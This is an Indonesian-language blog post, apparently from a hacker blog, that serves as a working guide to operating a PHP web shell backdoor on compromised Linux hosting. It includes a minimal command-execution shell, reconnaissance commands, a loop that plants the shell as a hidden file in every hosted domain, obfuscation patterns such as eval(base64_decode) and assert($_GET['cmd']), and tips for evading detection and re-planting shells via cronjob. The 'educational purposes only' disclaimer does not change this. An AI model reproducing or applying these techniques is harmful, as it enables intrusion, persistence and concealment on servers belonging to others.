CMD di Shell Backdoor(Linux Hosting)

6ickzone 0
CMD di Shell Backdoor

💻 CMD di Shell Backdoor (Linux Hosting)

1. Akses Shell

Gunakan shell yang ada cmd-nya/gunakan uploader dengan fungsi seperti system(), exec(), shell_exec(), atau passthru().

<?php
echo "<pre>";
system($_GET['cmd']);
echo "</pre>";
?>

Akses contoh:

http://target.com/shell.php?cmd=ls

2. Perintah CMD Penting dalam Webshell

Berikut ini adalah daftar perintah yang biasa digunakan dalam shell backdoor (Linux):

🗂️ Navigasi & File Management

FungsiPerintah
Lihat isi direktorils -la
Lihat isi per barisls -1
Masuk foldercd /path/folder
Lihat path aktifpwd
Kembali ke folder sebelumnyacd ..
Buat foldermkdir folder
Hapus filerm file.php
Hapus folder dan isirm -rf folder/
Salin filecp file1.php file2.php
Pindah filemv file.php /tujuan/
Rename filemv lama.php baru.php
Cari filefind / -name "file.php"
Cari file .phpfind / -name "*.php" 2>/dev/null
Cari folderfind / -type d -name "target"
Ubah permissionchmod 755 file.php
Lihat permissionls -l file.php

👤 Informasi User & Sistem

FungsiPerintah
Cek user aktifwhoami
Lihat semua usercut -d: -f1 /etc/passwd
Cek UIDid
Info OSuname -a
Info distrocat /etc/*release
Info CPUlscpu
Info memorifree -h
Info diskdf -h

⚙️ Proses, Network & Cronjob

FungsiPerintah
Lihat proses aktifps aux
Cek port aktifnetstat -tnlp
List croncrontab -l
Edit croncrontab -e
Semua croncat /etc/crontab

🌐 Networking & Download

FungsiPerintah
Download filewget http://site.com/file.php
Download curlcurl -O http://site.com/file.php
Pingping -c 4 google.com
Cek IPcurl ifconfig.me

🔁 Looping Shell

for i in /home/USERNAME/domains/*; do
  cp /tmp/shell.php "$i/public_html/.wp-cache.php"
done

🧠 Obfuscation Command

  • eval(base64_decode(...))
  • call_user_func("system", "ls")
  • assert($_GET['cmd']);
  • ($f='system')&&$f($_GET['x']);

3. Tips Hindari Deteksi

  • Gunakan nama file: .index_.php, sess_handler.php, .cache.php
  • Gunakan header PHP palsu: 
    header("X-Powered-By: PHP/8.1.12");
  • Gunakan function chaining: call_user_func(), assert(), base64_decode()

4. Path Hosting Umum

/home/(user)/domains/domain.com/public_html/

5. Tips Pro

  • Gunakan cronjob untuk auto-replant shell
  • Buat script untuk cek online/offline shell
  • Simpan list shell dalam shell_list.txt

Author: Nyx6st

⚠️ Disclaimer

This article is intended solely for educational purposes only. The creator shall not be held liable for any misuse, illegal activities, or damages resulting from the unauthorized use of this.

"Where creativity, exploitation, and expression collide." — 6ickZone

6ickzone

I've been deep in the world of cybersecurity, crypto, AI, and hacking for years. This blog is where I share my journey, tools, tips, and everything I learn along the way. But beyond code and exploits, there's also rhythm. I'm also exploring the digital soundscape — producing beats, fusing dark tech vibes with trap, drill, and EDM. Music is my second language, and it's where I channel the energy of the underground digital world. From my early days as a defacer to my current focus on ethical hacking and experimental music, I’m building 6ickzone as a hybrid space where hacking meets art. Why 6ickzone? 6ickzone is more than just a blog — it's a realm where hackers, beatmakers, and digital renegades gather. Whether you're here for the tools or the tunes, welcome to the zone.

Post a Comment

Posting Komentar

Lebih baru Lebih lama

Mengenai Saya

Foto saya
6ickzone
I've been deep in the world of cybersecurity, crypto, AI, and hacking for years. This blog is where I share my journey, tools, tips, and everything I learn along the way. But beyond code and exploits, there's also rhythm. I'm also exploring the digital soundscape — producing beats, fusing dark tech vibes with trap, drill, and EDM. Music is my second language, and it's where I channel the energy of the underground digital world. From my early days as a defacer to my current focus on ethical hacking and experimental music, I’m building 6ickzone as a hybrid space where hacking meets art. Why 6ickzone? 6ickzone is more than just a blog — it's a realm where hackers, beatmakers, and digital renegades gather. Whether you're here for the tools or the tunes, welcome to the zone.
Lihat profil lengkapku

Cari Blog Ini

About